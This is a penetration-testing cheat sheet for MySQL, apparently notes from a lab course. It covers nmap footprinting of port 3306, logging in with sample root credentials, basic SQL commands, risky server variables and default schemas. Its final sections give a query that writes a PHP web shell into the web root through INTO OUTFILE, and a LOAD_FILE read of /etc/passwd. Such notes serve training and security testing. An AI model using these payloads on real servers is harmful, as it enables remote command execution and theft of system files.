My Structured Query Language

Footprinting The Service

sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*

Interaction with the MySQL Server

mysql -u root -pP4SSw0rd -h 10.129.14.128

Commands

Command
Description

mysql -u <user> -p<password> -h <IP address>

Connect to the MySQL server. There should not be a space between the '-p' flag, and the password.

show databases;

Show all databases.

use <database>;

Select one of the existing databases.

show tables;

Show all available tables in the selected database.

show columns from <table>;

Show all columns in the selected database.

select * from <table>;

Show everything in the desired table.

select * from <table> where <column> = "<string>";

Search for needed string in the desired table.

Dangerous Settings

user

Sets which user the MySQL service will run as.

password

Sets the password for the MySQL user.

admin_address

The IP address on which to listen for TCP/IP connections on the administrative network interface.

debug

This variable indicates the current debugging settings

sql_warnings

This variable controls whether single-row INSERT statements produce an information string if warnings occur.

secure_file_priv

This variable is used to limit the effect of data import and export operations.

MySQL default system schemas/databases:

  • mysql - is the system database that contains tables that store information required by the MySQL server

  • information_schema - provides access to database metadata

  • performance_schema - is a feature for monitoring MySQL Server execution at a low level

  • sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema

Write Local File

SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

File Write Privileges

show variables like "secure_file_priv";
We can see the secure_file_priv variable is empty, which means we can read and write data using MySQL

Read Local File

select LOAD_FILE("/etc/passwd");
By default a MySQL installation does not allow arbitrary file read, but if the correct settings are in place and with the appropriate privileges, we can read files

Last updated